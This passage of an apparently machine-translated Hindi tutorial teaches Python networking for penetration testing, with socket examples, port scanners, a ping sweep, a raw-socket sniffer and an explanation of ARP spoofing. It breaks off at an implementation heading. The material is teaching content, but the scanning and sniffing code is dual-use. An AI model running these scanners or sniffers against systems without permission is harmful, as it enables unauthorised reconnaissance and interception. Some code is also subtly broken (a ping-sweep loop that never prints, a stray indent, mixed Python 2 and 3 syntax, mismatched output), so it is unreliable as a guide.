  • socket.sendto(data, address)- जैसा कि नाम से ही स्पष्ट है, इस पद्धति का उपयोग सॉकेट से डेटा भेजने के लिए किया जाता है। इस विधि द्वारा दो जोड़ी (डेटा, पता) मान लौटाया जाता है। डेटा भेजे गए बाइट्स की संख्या को परिभाषित करता है और पता रिमोट मशीन के पते को निर्दिष्ट करता है।

  • socket.close() - यह विधि सॉकेट बंद कर देगी।

  • socket.gethostname() - यह तरीका होस्ट का नाम वापस कर देगा।

  • socket.sendall(data)- यह विधि सॉकेट को सभी डेटा भेजता है जो रिमोट मशीन से जुड़ा होता है। यह त्रुटि रहित होने तक डेटा को लापरवाही से स्थानांतरित करता है और यदि ऐसा होता है तो यह सॉकेट को बंद करने के लिए socket.close () विधि का उपयोग करता है।

सर्वर और क्लाइंट के बीच संबंध स्थापित करने का कार्यक्रम

सर्वर और क्लाइंट के बीच संबंध स्थापित करने के लिए, हमें दो अलग-अलग पायथन प्रोग्राम लिखने होंगे, एक सर्वर के लिए और दूसरा क्लाइंट के लिए।

सर्वर-साइड प्रोग्राम

इस सर्वर साइड सॉकेट प्रोग्राम में, हम इसका उपयोग करेंगे socket.bind()विधि जो इसे एक विशिष्ट आईपी पते और पोर्ट से बांधती है ताकि यह उस आईपी और पोर्ट पर आने वाले अनुरोधों को सुन सके। बाद में, हम उपयोग करते हैंsocket.listen()विधि जो सर्वर को सुन मोड में रखती है। संख्या, 4 का कहना है, के तर्क के रूप मेंsocket.listen()विधि का अर्थ है कि सर्वर व्यस्त होने पर 4 कनेक्शन प्रतीक्षा कर रहे हैं और यदि 5 वें सॉकेट कनेक्ट करने का प्रयास करता है तो कनेक्शन मना कर दिया जाता है। हम का उपयोग करके ग्राहक को एक संदेश भेज देंगेsocket.send()तरीका। अंत की ओर, हम उपयोग करते हैंsocket.accept() तथा socket.close()क्रमशः कनेक्शन शुरू करने और बंद करने की विधि। निम्नलिखित एक सर्वर साइड प्रोग्राम है -

import socket
def Main():
   host = socket.gethostname()
   port = 12345
   serversocket = socket.socket()
   serversocket.bind((host,port))
   serversocket.listen(1)
   print('socket is listening')
   
   while True:
      conn,addr = serversocket.accept()
      print("Got connection from %s" % str(addr))
      msg = 'Connecting Established'+ "\r\n"
      conn.send(msg.encode('ascii'))
      conn.close()
if __name__ == '__main__':
   Main()

क्लाइंट-साइड प्रोग्राम

क्लाइंट-साइड सॉकेट प्रोग्राम में, हमें सॉकेट ऑब्जेक्ट बनाने की आवश्यकता है। फिर हम उस पोर्ट से कनेक्ट करेंगे जिस पर हमारा सर्वर चल रहा है - हमारे उदाहरण में 12345। उसके बाद हम का उपयोग करके एक कनेक्शन स्थापित करेगाsocket.connect()तरीका। तब का उपयोग करकेsocket.recv()विधि, क्लाइंट को सर्वर से संदेश प्राप्त होगा। आखिर में दsocket.close() विधि ग्राहक को बंद कर देगी।

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

host = socket.gethostname()
port = 12345

s.connect((host, port))
msg = s.recv(1024)

s.close()
print (msg.decode('ascii'))

अब, सर्वर-साइड प्रोग्राम चलाने के बाद हमें टर्मिनल पर निम्न आउटपुट मिलेंगे -

socket is listening
Got connection from ('192.168.43.75', 49904)

और क्लाइंट-साइड प्रोग्राम चलाने के बाद, हम अन्य टर्मिनल पर निम्न आउटपुट प्राप्त करेंगे -

Connection Established

नेटवर्क सॉकेट अपवादों को हैंडल करना

दो ब्लॉक हैं try तथा exceptजिसका उपयोग नेटवर्क सॉकेट अपवादों को संभालने के लिए किया जा सकता है। अपवाद से निपटने के लिए पायथन लिपि निम्नलिखित है -

import socket
host = "192.168.43.75"
port = 12345
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
   s.bind((host,port))
   s.settimeout(3)
   data, addr = s.recvfrom(1024)
   print ("recevied from ",addr)
   print ("obtained ", data)
   s.close()
except socket.timeout :
   print ("No connection between client and server")
   s.close()

उत्पादन

उपरोक्त कार्यक्रम निम्नलिखित आउटपुट उत्पन्न करता है -

No connection between client and server

उपरोक्त स्क्रिप्ट में, पहले हमने एक सॉकेट ऑब्जेक्ट बनाया। इसके बाद होस्ट आईपी एड्रेस और पोर्ट नंबर प्रदान किया गया, जिस पर हमारा सर्वर चल रहा है - हमारे उदाहरण में 12345। बाद में, कोशिश ब्लॉक का उपयोग किया जाता है और इसके अंदर का उपयोग करकेsocket.bind()विधि, हम आईपी पते और पोर्ट को बांधने की कोशिश करेंगे। हम प्रयोग कर रहे हैंsocket.settimeout()ग्राहक के लिए प्रतीक्षा समय निर्धारित करने की विधि, हमारे उदाहरण में हम 3 सेकंड सेट कर रहे हैं। अपवाद ब्लॉक का उपयोग किया जाता है जो सर्वर और क्लाइंट के बीच कनेक्शन स्थापित नहीं होने पर एक संदेश प्रिंट करेगा।

पोर्ट स्कैनिंग को एक निगरानी तकनीक के रूप में परिभाषित किया जा सकता है, जिसका उपयोग किसी विशेष होस्ट पर उपलब्ध खुले पोर्ट का पता लगाने के लिए किया जाता है। नेटवर्क व्यवस्थापक, पैठ परीक्षक या एक हैकर इस तकनीक का उपयोग कर सकते हैं। हम लक्ष्य प्रणाली से अधिकतम जानकारी प्राप्त करने के लिए अपनी आवश्यकताओं के अनुसार पोर्ट स्कैनर को कॉन्फ़िगर कर सकते हैं।

अब, पोर्ट स्कैन को चलाने के बाद मिलने वाली जानकारी पर विचार करें -

  • खुले बंदरगाहों के बारे में जानकारी।

  • प्रत्येक पोर्ट पर चलने वाली सेवाओं के बारे में जानकारी।

  • लक्ष्य होस्ट के ओएस और मैक पते के बारे में जानकारी।

पोर्ट स्कैनिंग एक चोर की तरह है, जो हर दरवाजे और खिड़की की जांच करके एक घर में प्रवेश करना चाहता है, जो कि खुले हैं। जैसा कि पहले चर्चा की गई, टीसीपी / आईपी प्रोटोकॉल सूट, इंटरनेट पर संचार के लिए उपयोग, दो प्रोटोकॉल अर्थात् टीसीपी और यूडीपी से बना है। दोनों प्रोटोकॉल में 0 से 65535 पोर्ट हैं। चूंकि यह अनिवार्य रूप से हमारे सिस्टम के अनावश्यक बंदरगाहों को बंद करने की सलाह देता है इसलिए अनिवार्य रूप से, लॉक करने के लिए 65000 से अधिक दरवाजे (पोर्ट) हैं। इन 65535 बंदरगाहों को निम्नलिखित तीन श्रेणियों में विभाजित किया जा सकता है -

  • सिस्टम या प्रसिद्ध बंदरगाह: 0 से 1023 तक

  • उपयोगकर्ता या पंजीकृत पोर्ट: 1024 से 49151 तक

  • गतिशील या निजी बंदरगाह: सभी> 49151

पोर्ट स्कैनर सॉकेट का उपयोग कर

हमारे पिछले अध्याय में, हमने चर्चा की कि सॉकेट क्या है। अब, हम सॉकेट का उपयोग करके एक साधारण पोर्ट स्कैनर बनाएंगे। सॉकेट का उपयोग करते हुए पोर्ट स्कैनर के लिए पायथन स्क्रिप्ट निम्नलिखित है -

from socket import *
import time
startTime = time.time()

if __name__ == '__main__':
   target = input('Enter the host to be scanned: ')
   t_IP = gethostbyname(target)
   print ('Starting scan on host: ', t_IP)
   
   for i in range(50, 500):
      s = socket(AF_INET, SOCK_STREAM)
      
      conn = s.connect_ex((t_IP, i))
      if(conn == 0) :
         print ('Port %d: OPEN' % (i,))
      s.close()
print('Time taken:', time.time() - startTime)

जब हम उपरोक्त स्क्रिप्ट चलाते हैं, तो यह होस्टनाम के लिए संकेत देगा, आप किसी भी वेबसाइट का नाम जैसे होस्टनाम प्रदान कर सकते हैं, लेकिन सावधान रहें क्योंकि पोर्ट स्कैनिंग को एक अपराध के रूप में देखा जा सकता है, या माना जा सकता है। हमें उस सर्वर या कंप्यूटर के स्पष्ट, लिखित अनुमति के बिना किसी भी वेबसाइट या आईपी पते के खिलाफ पोर्ट स्कैनर निष्पादित नहीं करना चाहिए जिसे आप लक्षित कर रहे हैं। पोर्ट स्कैनिंग किसी के घर जाने और उनके दरवाजों और खिड़कियों की जांच करने के समान है। यही कारण है कि लोकलहोस्ट या अपनी खुद की वेबसाइट (यदि कोई हो) पर पोर्ट स्कैनर का उपयोग करना उचित है।

उत्पादन

उपरोक्त स्क्रिप्ट निम्नलिखित आउटपुट उत्पन्न करता है -

Enter the host to be scanned: localhost
Starting scan on host: 127.0.0.1
Port 135: OPEN
Port 445: OPEN
Time taken: 452.3990001678467

आउटपुट से पता चलता है कि 50 से 500 की रेंज में (जैसा कि स्क्रिप्ट में प्रदान किया गया है), इस पोर्ट स्कैनर को दो पोर्ट - पोर्ट 135 और 445 मिले, खुले। हम इस सीमा को बदल सकते हैं और अन्य बंदरगाहों के लिए जाँच कर सकते हैं।

पोर्ट स्कैनर ICMP (नेटवर्क में लाइव होस्ट) का उपयोग कर

ICMP एक पोर्ट स्कैन नहीं है लेकिन इसका उपयोग रिमोट होस्ट को पिंग करने के लिए किया जाता है ताकि यह पता चल सके कि होस्ट होस्ट है या नहीं। यह स्कैन तब उपयोगी होता है जब हमें किसी नेटवर्क में कई लाइव होस्ट की जांच करनी होती है। इसमें एक होस्ट को ICMP ECHO रिक्वेस्ट भेजना शामिल है और यदि वह होस्ट लाइव है, तो वह ICMP ECHO का उत्तर देगा।

आईसीएमपी अनुरोध भेजने की उपरोक्त प्रक्रिया को पिंग स्कैन भी कहा जाता है, जो ऑपरेटिंग सिस्टम के पिंग कमांड द्वारा प्रदान किया जाता है।

पिंग स्वीप की अवधारणा

दरअसल एक या दूसरे अर्थ में, पिंग स्वीप को पिंग स्वीपिंग के नाम से भी जाना जाता है। एकमात्र अंतर यह है कि पिंग स्वीपिंग विशिष्ट नेटवर्क रेंज में एक से अधिक मशीन उपलब्धता खोजने की प्रक्रिया है। उदाहरण के लिए, मान लें कि हम IP पतों की एक पूरी सूची का परीक्षण करना चाहते हैं, तो पिंग स्कैन का उपयोग करके, यानी ऑपरेटिंग सिस्टम के पिंग कमांड को एक-एक करके IP पतों को स्कैन करने में बहुत समय लगेगा। इसलिए हमें पिंग स्वीप स्क्रिप्ट का उपयोग करने की आवश्यकता है। पिंग स्वीप का उपयोग करके लाइव होस्ट खोजने के लिए पायथन स्क्रिप्ट निम्नलिखित है -

import os
import platform

from datetime import datetime
net = input("Enter the Network Address: ")
net1= net.split('.')
a = '.'

net2 = net1[0] + a + net1[1] + a + net1[2] + a
st1 = int(input("Enter the Starting Number: "))
en1 = int(input("Enter the Last Number: "))
en1 = en1 + 1
oper = platform.system()

if (oper == "Windows"):
   ping1 = "ping -n 1 "
elif (oper == "Linux"):
   ping1 = "ping -c 1 "
else :
   ping1 = "ping -c 1 "
t1 = datetime.now()
print ("Scanning in Progress:")

for ip in range(st1,en1):
   addr = net2 + str(ip)
   comm = ping1 + addr
   response = os.popen(comm)
   
   for line in response.readlines():
      if(line.count("TTL")):
         break
      if (line.count("TTL")):
         print (addr, "--> Live")
         
t2 = datetime.now()
total = t2 - t1
print ("Scanning completed in: ",total)

उपरोक्त लिपि तीन भागों में काम करती है। यह पहली बार आईपी एड्रेस की रेंज को भागों में विभाजित करके पिंग स्वीप स्कैन का चयन करता है। इसके बाद फ़ंक्शन का उपयोग किया जाता है, जो ऑपरेटिंग सिस्टम के अनुसार पिंग स्वीपिंग के लिए कमांड का चयन करेगा, और अंतिम यह स्कैनिंग प्रक्रिया को पूरा करने के लिए होस्ट और समय के बारे में प्रतिक्रिया दे रहा है।

उत्पादन

उपरोक्त स्क्रिप्ट निम्नलिखित आउटपुट उत्पन्न करता है -

Enter the Network Address: 127.0.0.1
Enter the Starting Number: 1
Enter the Last Number: 100

Scanning in Progress:
Scanning completed in: 0:00:02.711155

उपरोक्त आउटपुट कोई लाइव पोर्ट नहीं दिखा रहा है क्योंकि फ़ायरवॉल चालू है और ICMP इनबाउंड सेटिंग्स अक्षम हैं। इन सेटिंग्स को बदलने के बाद, हम आउटपुट में प्रदान किए गए 1 से 100 तक के लाइव पोर्ट की सूची प्राप्त कर सकते हैं।

पोर्ट स्कैनर टीसीपी स्कैन का उपयोग कर

टीसीपी कनेक्शन स्थापित करने के लिए, होस्ट को तीन-तरफ़ा हैंडशेक करना होगा। क्रिया करने के लिए इन चरणों का पालन करें -

Step 1 − Packet with SYN flag set

इस चरण में, एक कनेक्शन शुरू करने की कोशिश कर रहा सिस्टम एक पैकेट के साथ शुरू होता है जिसमें SYN ध्वज सेट होता है।

Step 2 − Packet with SYN-ACK flag set

इस चरण में, लक्ष्य प्रणाली SYN और ACK ध्वज सेट के साथ एक पैकेट लौटाती है।

Step 3 − Packet with ACK flag set

अंत में, दीक्षा प्रणाली एसीके ध्वज सेट के साथ मूल लक्ष्य प्रणाली को एक पैकेट लौटाएगा।

फिर भी, यहां जो सवाल उठता है वह यह है कि अगर हम ICMP इको रिक्वेस्ट और रिप्लाई विधि (पिंग स्वीप स्कैनर) का उपयोग करके पोर्ट स्कैनिंग कर सकते हैं तो हमें टीसीपी स्कैन की आवश्यकता क्यों है? इसके पीछे मुख्य कारण यह माना जाता है कि यदि हम ICMP ECHO उत्तर सुविधा को बंद कर देते हैं या ICMP पैकेट में फ़ायरवॉल का उपयोग करते हैं तो पिंग स्वीप स्कैनर काम नहीं करेगा और हमें TCP स्कैन की आवश्यकता है।

import socket
from datetime import datetime
net = input("Enter the IP address: ")
net1 = net.split('.')
a = '.'

net2 = net1[0] + a + net1[1] + a + net1[2] + a
st1 = int(input("Enter the Starting Number: "))
en1 = int(input("Enter the Last Number: "))
en1 = en1 + 1
t1 = datetime.now()

def scan(addr):
   s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   socket.setdefaulttimeout(1)
   result = s.connect_ex((addr,135))
   if result == 0:
      return 1
   else :
      return 0

def run1():
   for ip in range(st1,en1):
      addr = net2 + str(ip)
      if (scan(addr)):
         print (addr , "is live")
         
run1()
t2 = datetime.now()
total = t2 - t1
print ("Scanning completed in: " , total)

उपरोक्त लिपि तीन भागों में काम करती है। यह आईपी पते की सीमा को भागों में विभाजित करके पिंग स्कैन का चयन करता है। इसके बाद पते को स्कैन करने के लिए एक फ़ंक्शन का उपयोग किया जाता है, जो सॉकेट का उपयोग करता है। बाद में, यह स्कैनिंग प्रक्रिया को पूरा करने के लिए किए गए होस्ट और समय के बारे में प्रतिक्रिया देता है। परिणाम = एस। connect_ex ((Addr, 135)) स्टेटमेंट एक त्रुटि संकेतक देता है। त्रुटि सूचक 0 है यदि ऑपरेशन सफल होता है, अन्यथा, यह त्रुटिपूर्ण चर का मान है। यहां, हमने पोर्ट 135 का इस्तेमाल किया; यह स्कैनर विंडोज सिस्टम के लिए काम करता है। एक और पोर्ट जो यहां काम करेगा वह है 445 (Microsoft-DSActive Directory) और आमतौर पर खुला है।

उत्पादन

उपरोक्त स्क्रिप्ट निम्नलिखित आउटपुट उत्पन्न करता है -

Enter the IP address: 127.0.0.1
Enter the Starting Number: 1
Enter the Last Number: 10

127.0.0.1 is live
127.0.0.2 is live
127.0.0.3 is live
127.0.0.4 is live
127.0.0.5 is live
127.0.0.6 is live
127.0.0.7 is live
127.0.0.8 is live
127.0.0.9 is live
127.0.0.10 is live
Scanning completed in: 0:00:00.230025

दक्षता बढ़ाने के लिए थ्रेडेड पोर्ट स्कैनर

जैसा कि हमने उपरोक्त मामलों में देखा है, पोर्ट स्कैनिंग बहुत धीमी हो सकती है। उदाहरण के लिए, आप सॉकेट पोर्ट स्कैनर का उपयोग करते हुए, 50 से 500 तक पोर्ट स्कैन करने के लिए लिया गया समय देख सकते हैं, यह 452.3990001678467 है। गति में सुधार के लिए हम थ्रेडिंग का उपयोग कर सकते हैं। निम्नलिखित थ्रेडिंग का उपयोग करते हुए पोर्ट स्कैनर का एक उदाहरण है -

import socket
import time
import threading

from queue import Queue
socket.setdefaulttimeout(0.25)
print_lock = threading.Lock()

target = input('Enter the host to be scanned: ')
t_IP = socket.gethostbyname(target)
print ('Starting scan on host: ', t_IP)

def portscan(port):
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   try:
      con = s.connect((t_IP, port))
      with print_lock:
         print(port, 'is open')
      con.close()
   except:
      pass

def threader():
   while True:
      worker = q.get()
      portscan(worker)
      q.task_done()
      
q = Queue()
   startTime = time.time()
   
for x in range(100):
   t = threading.Thread(target = threader)
   t.daemon = True
   t.start()
   
for worker in range(1, 500):
   q.put(worker)
   
q.join()
print('Time taken:', time.time() - startTime)

उपरोक्त स्क्रिप्ट में, हमें थ्रेडिंग मॉड्यूल को आयात करने की आवश्यकता है, जो पायथन पैकेज में इनबिल्ट है। हम थ्रेड लॉकिंग अवधारणा का उपयोग कर रहे हैं,thread_lock = threading.Lock()एक बार में कई संशोधन से बचने के लिए। असल में, थ्रेडिंग। लॉक () एक बार में एक धागे को चर तक पहुंचने की अनुमति देगा। इसलिए, कोई दोहरा संशोधन नहीं होता है।

बाद में, हम एक थ्रेडर () फ़ंक्शन को परिभाषित करते हैं जो लूप के लिए कार्यकर्ता से काम (बंदरगाह) लाएगा। फिर पोर्ट्सकैन () विधि को पोर्ट से कनेक्ट करने और परिणाम प्रिंट करने के लिए कहा जाता है। पोर्ट नंबर को पैरामीटर के रूप में पास किया जाता है। कार्य पूरा होने के बाद q.task_done () विधि कहा जाता है।

अब उपरोक्त स्क्रिप्ट को चलाने के बाद, हम 50 से 500 पोर्ट को स्कैन करने की गति में अंतर देख सकते हैं। इसमें केवल 1.3589999675750732 सेकंड लगे, जो कि लोकलहोस्ट के समान पोर्ट को स्कैन करने के लिए सॉकेट पोर्ट स्कैनर द्वारा लिए गए 452.3990001678467 से बहुत कम है।

उत्पादन

उपरोक्त स्क्रिप्ट निम्नलिखित आउटपुट उत्पन्न करता है -

Enter the host to be scanned: localhost
Starting scan on host: 127.0.0.1
135 is open
445 is open
Time taken: 1.3589999675750732

सूँघना या नेटवर्क पैकेट सूँघना सूँघने के साधनों का उपयोग करके किसी दिए गए नेटवर्क से गुजरने वाले सभी पैकेटों की निगरानी और कैप्चरिंग की प्रक्रिया है। यह एक ऐसा रूप है, जिसमें हम "फोन तारों को टैप" कर सकते हैं और बातचीत को जान सकते हैं। इसे भी कहा जाता हैwiretapping और कंप्यूटर नेटवर्क पर लागू किया जा सकता है।

इतनी संभावना है कि यदि उद्यम स्विच पोर्ट का एक सेट खुला है, तो उनका एक कर्मचारी नेटवर्क के पूरे ट्रैफ़िक को सूँघ सकता है। समान भौतिक स्थान में कोई भी ईथरनेट केबल का उपयोग करके नेटवर्क में प्लग कर सकता है या वायरलेस से उस नेटवर्क से जुड़ सकता है और कुल ट्रैफ़िक को सूँघ सकता है।

दूसरे शब्दों में, सूँघने से आप संरक्षित और असुरक्षित दोनों तरह के यातायात देख सकते हैं। सही परिस्थितियों में और सही प्रोटोकॉल के साथ, एक हमलावर पार्टी ऐसी जानकारी एकत्र करने में सक्षम हो सकती है जो आगे के हमलों के लिए या नेटवर्क या सिस्टम के मालिक के लिए अन्य मुद्दों का कारण बन सकती है।

क्या सूँघा जा सकता है?

एक नेटवर्क से निम्नलिखित संवेदनशील जानकारी सूँघ सकता है -

  • ईमेल ट्रैफ़िक
  • एफ़टीपी पासवर्ड
  • वेब ट्रैफ़िक
  • टेलनेट पासवर्ड
  • राउटर कॉन्फ़िगरेशन
  • चैट सत्र
  • डीएनएस यातायात

सूँघने का काम कैसे होता है?

एक स्निफर सामान्य रूप से सिस्टम के एनआईसी को प्रोमिसस मोड में बदल देता है ताकि वह अपने सेगमेंट पर प्रसारित सभी डेटा को सुन सके।

विशिष्ट मोड ईथरनेट हार्डवेयर के अनूठे तरीके को संदर्भित करता है, विशेष रूप से, नेटवर्क इंटरफ़ेस कार्ड (एनआईसी), जो एनआईसी को नेटवर्क पर सभी ट्रैफ़िक प्राप्त करने की अनुमति देता है, भले ही वह इस एनआईसी को संबोधित न हो। डिफ़ॉल्ट रूप से, एक एनआईसी सभी ट्रैफ़िक को अनदेखा करता है जो इसे संबोधित नहीं करता है, जो डिवाइस के हार्डवेयर पते (मैक) के साथ ईथरनेट पैकेट के गंतव्य पते की तुलना करके किया जाता है। हालांकि यह नेटवर्किंग के लिए एकदम सही समझ में आता है, गैर-विवादास्पद मोड कनेक्टिविटी मुद्दों या ट्रैफ़िक लेखांकन के निदान के लिए नेटवर्क निगरानी और विश्लेषण सॉफ़्टवेयर का उपयोग करना मुश्किल बनाता है।

एक स्निफ़र एनआईसी के माध्यम से कंप्यूटर के सभी ट्रैफ़िक की लगातार निगरानी कर सकता है, ताकि डेटा पैकेट में दी गई जानकारी को डिकोड कर सके।

सूँघने का प्रकार

सूँघना या तो सक्रिय या स्वभाव में निष्क्रिय हो सकता है। अब हम विभिन्न प्रकार के सूँघने के बारे में जानेंगे।

निष्क्रिय सूँघना

निष्क्रिय सूँघने में, यातायात बंद है लेकिन इसे किसी भी तरह से नहीं बदला जाता है। निष्क्रिय सूँघने से केवल सुनने की अनुमति मिलती है। यह हब उपकरणों के साथ काम करता है। हब डिवाइस पर, ट्रैफ़िक को सभी पोर्ट पर भेजा जाता है। सिस्टम को जोड़ने के लिए हब का उपयोग करने वाले नेटवर्क में, नेटवर्क पर सभी होस्ट ट्रैफ़िक देख सकते हैं। इसलिए, एक हमलावर आसानी से गुजरने वाले ट्रैफ़िक को पकड़ सकता है।

अच्छी खबर यह है कि हाल के दिनों में हब लगभग अप्रचलित हो गए हैं। अधिकांश आधुनिक नेटवर्क स्विच का उपयोग करते हैं। इसलिए, निष्क्रिय सूँघना अधिक प्रभावी नहीं है।

सक्रिय सूँघना

सक्रिय सूँघने में, ट्रैफ़िक को न केवल लॉक और मॉनिटर किया जाता है, बल्कि इसे किसी तरह से बदल दिया जा सकता है जैसा कि हमले द्वारा निर्धारित किया गया है। स्विच-आधारित नेटवर्क को सूँघने के लिए सक्रिय सूँघने का उपयोग किया जाता है। इसमें स्विच रिज़ॉल्यूशन एड्रेसेबल मेमोरी (CAM) टेबल पर बाढ़ के लिए एड्रेस रिज़ॉल्यूशन पैकेट (ARP) को एक लक्ष्य नेटवर्क में इंजेक्ट करना शामिल है। CAM किस पोर्ट से जुड़ा हुआ है, इसका ट्रैक रखता है।

निम्नलिखित सक्रिय सूँघने की तकनीकें हैं -

  • मैक बाढ़
  • डीएचसीपी हमलों
  • डीएनएस जहर
  • स्पूफिंग अटैक
  • एआरपी जहर

प्रोटोकॉल पर सूँघने का प्रभाव

प्रोटोकॉल जैसे tried and true TCP/IPकभी भी सुरक्षा को ध्यान में रखकर नहीं बनाया गया। इस तरह के प्रोटोकॉल संभावित घुसपैठियों के लिए बहुत प्रतिरोध की पेशकश नहीं करते हैं। निम्नलिखित विभिन्न प्रोटोकॉल हैं जो आसान सूँघने के लिए उधार देते हैं -

एचटीटीपी

इसका उपयोग बिना किसी एन्क्रिप्शन के स्पष्ट पाठ में जानकारी भेजने और इस प्रकार वास्तविक लक्ष्य के लिए किया जाता है।

SMTP (सिंपल मेल ट्रांसफर प्रोटोकॉल)

ईमेल के हस्तांतरण में एसएमटीपी का उपयोग किया जाता है। यह प्रोटोकॉल कुशल है, लेकिन इसमें सूँघने से सुरक्षा शामिल नहीं है।

NNTP (नेटवर्क समाचार स्थानांतरण प्रोटोकॉल)

इसका उपयोग सभी प्रकार के संचार के लिए किया जाता है। इसके साथ एक बड़ी खामी यह है कि डेटा और यहां तक ​​कि पासवर्ड भी स्पष्ट पाठ के रूप में नेटवर्क पर भेजे जाते हैं।

पीओपी (पोस्ट ऑफिस प्रोटोकॉल)

सर्वरों से ईमेल प्राप्त करने के लिए POP का उपयोग सख्ती से किया जाता है। इस प्रोटोकॉल में सूँघने से सुरक्षा शामिल नहीं है क्योंकि यह फंस सकता है।

एफ़टीपी (फ़ाइल स्थानांतरण प्रोटोकॉल)

एफ़टीपी का उपयोग फ़ाइलों को भेजने और प्राप्त करने के लिए किया जाता है, लेकिन यह किसी भी सुरक्षा सुविधाओं की पेशकश नहीं करता है। सभी डेटा को स्पष्ट पाठ के रूप में भेजा जाता है जिसे आसानी से सूँघा जा सकता है।

IMAP (इंटरनेट संदेश एक्सेस प्रोटोकॉल)

IMAP अपने कार्यों में SMTP के समान है, लेकिन यह सूँघने के लिए अत्यधिक असुरक्षित है।

टेलनेट

टेलनेट नेटवर्क पर सब कुछ (उपयोगकर्ता नाम, पासवर्ड, कीस्ट्रोक्स) स्पष्ट पाठ के रूप में भेजता है और इसलिए, इसे आसानी से सूँघा जा सकता है।

स्निफ़र्स गूंगा उपयोगिताओं नहीं हैं जो आपको केवल लाइव ट्रैफ़िक देखने की अनुमति देते हैं। यदि आप वास्तव में प्रत्येक पैकेट का विश्लेषण करना चाहते हैं, तो कैप्चर को सहेजें और जब भी समय हो, इसकी समीक्षा करें।

पायथन का उपयोग करके कार्यान्वयन

कच्चे सॉकेट स्निफर को लागू करने से पहले, आइए इसे समझते हैं struct नीचे वर्णित विधि -

struct.pack (fmt, a1, a2,…)

जैसा कि नाम से पता चलता है, इस पद्धति का उपयोग स्ट्रिंग को वापस करने के लिए किया जाता है, जिसे दिए गए प्रारूप के अनुसार पैक किया जाता है। स्ट्रिंग में मान a1, a2 इत्यादि शामिल हैं।

संरचना ।unpack (एफएमटी, स्ट्रिंग)

जैसा कि नाम से पता चलता है, यह विधि किसी दिए गए प्रारूप के अनुसार स्ट्रिंग को खोलती है।

कच्चे सॉकेट स्निफर आईपी हेडर के निम्नलिखित उदाहरण में, जो पैकेट में अगले 20 बाइट्स हैं और इन 20 बाइट्स के बीच हम पिछले 8 बाइट्स में रुचि रखते हैं। यदि स्रोत और गंतव्य IP पता पार्स कर रहे हैं तो बाद वाले बाइट्स दिखाते हैं -

अब, हमें कुछ बुनियादी मॉड्यूल आयात करने की आवश्यकता है -

import socket
import struct
import binascii

अब, हम एक सॉकेट बनाएंगे, जिसमें तीन पैरामीटर होंगे। पहला पैरामीटर हमें पैकेट इंटरफ़ेस के बारे में बताता है - विंडोज़ के लिए लिनक्स विशिष्ट और AF_INET के लिए PF_PACKET; दूसरा पैरामीटर हमें बताता है कि यह एक कच्चा सॉकेट है और तीसरा पैरामीटर हमें उस प्रोटोकॉल के बारे में बताता है जिसे हम रुचि रखते हैं —0x0800 आईपी प्रोटोकॉल के लिए उपयोग किया जाता है।

s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket. htons(0x0800))

अब, हमें कॉल करने की आवश्यकता है recvfrom() पैकेट प्राप्त करने की विधि।

while True:
   packet = s.recvfrom(2048)

कोड की निम्नलिखित पंक्ति में, हम ईथरनेट हेडर को रिप कर रहे हैं -

ethernet_header = packet[0][0:14]

कोड की निम्नलिखित पंक्ति के साथ, हम शीर्ष लेख को पार्स और अनपैक कर रहे हैं struct विधि -

eth_header = struct.unpack("!6s6s2s", ethernet_header)

कोड की निम्न पंक्ति तीन हेक्स मानों के साथ एक टपल लौटेगी, जिसके द्वारा परिवर्तित किया गया है hexify में binascii मॉड्यूल -

print "Destination MAC:" + binascii.hexlify(eth_header[0]) + " Source MAC:" + binascii.hexlify(eth_header[1]) + " Type:" + binascii.hexlify(eth_header[2])

अब हम कोड के निम्नलिखित लाइन को निष्पादित करके आईपी हेडर प्राप्त कर सकते हैं -

ipheader = pkt[0][14:34]
ip_header = struct.unpack("!12s4s4s", ipheader)
print "Source IP:" + socket.inet_ntoa(ip_header[1]) + " Destination IP:" + socket.inet_ntoa(ip_header[2])

इसी तरह, हम टीसीपी हेडर को भी पार्स कर सकते हैं।

ARP को एक स्टेटलेस प्रोटोकॉल के रूप में परिभाषित किया जा सकता है, जिसका उपयोग इंटरनेट प्रोटोकॉल (IP) पतों को भौतिक मशीन पतों पर मैप करने के लिए किया जाता है।

एआरपी का कार्य करना

इस खंड में, हम एआरपी के कामकाज के बारे में जानेंगे। ARP कैसे काम करता है, यह समझने के लिए निम्नलिखित चरणों पर विचार करें -

  • Step 1 - पहला, जब एक मशीन दूसरे के साथ संवाद करना चाहती है तो उसे भौतिक पते के लिए अपनी एआरपी तालिका तक देखना होगा।

  • Step 2 - यदि यह मशीन का भौतिक पता पाता है, तो पैकेट को उसकी सही लंबाई में परिवर्तित करने के बाद, उसे वांछित मशीन पर भेज दिया जाएगा

  • Step 3 - लेकिन अगर तालिका में आईपी पते के लिए कोई प्रविष्टि नहीं मिली है, तो ARP_request नेटवर्क पर प्रसारित किया जाएगा।

  • Step 4- अब, नेटवर्क की सभी मशीनें ब्रॉडकास्ट किए गए आईपी एड्रेस की तुलना मैक एड्रेस से करेंगी और अगर नेटवर्क की कोई भी मशीन एड्रेस की पहचान करती है, तो वह अपने आईपी और मैक एड्रेस के साथ ARP_request पर प्रतिक्रिया देगा। ऐसे ARP संदेश को ARP_reply कहा जाता है।

  • Step 5 - अंत में, अनुरोध भेजने वाली मशीन अपनी एआरपी तालिका में पता जोड़ी को संग्रहीत करेगी और संपूर्ण संचार होगा।

एआरपी स्पूफिंग क्या है?

इसे एक प्रकार के हमले के रूप में परिभाषित किया जा सकता है जहां एक दुर्भावनापूर्ण अभिनेता स्थानीय क्षेत्र नेटवर्क पर जाली एआरपी अनुरोध भेज रहा है। ARP Poisoning को ARP Spoofing के नाम से भी जाना जाता है। इसे निम्नलिखित बिंदुओं की सहायता से समझा जा सकता है -

  • पहला ARP स्पूफिंग, स्विच को ओवरलोड करने के लिए, भारी संख्या में गलत ARP अनुरोध और उत्तर पैकेट का निर्माण करेगा।

  • फिर स्विच को फ़ॉरवर्डिंग मोड में सेट किया जाएगा।

  • अब, एआरपी तालिका खराब एआरपी प्रतिक्रियाओं से भर जाएगी, ताकि हमलावर सभी नेटवर्क पैकेटों को सूँघ सकें।

पायथन का उपयोग करके कार्यान्वयन

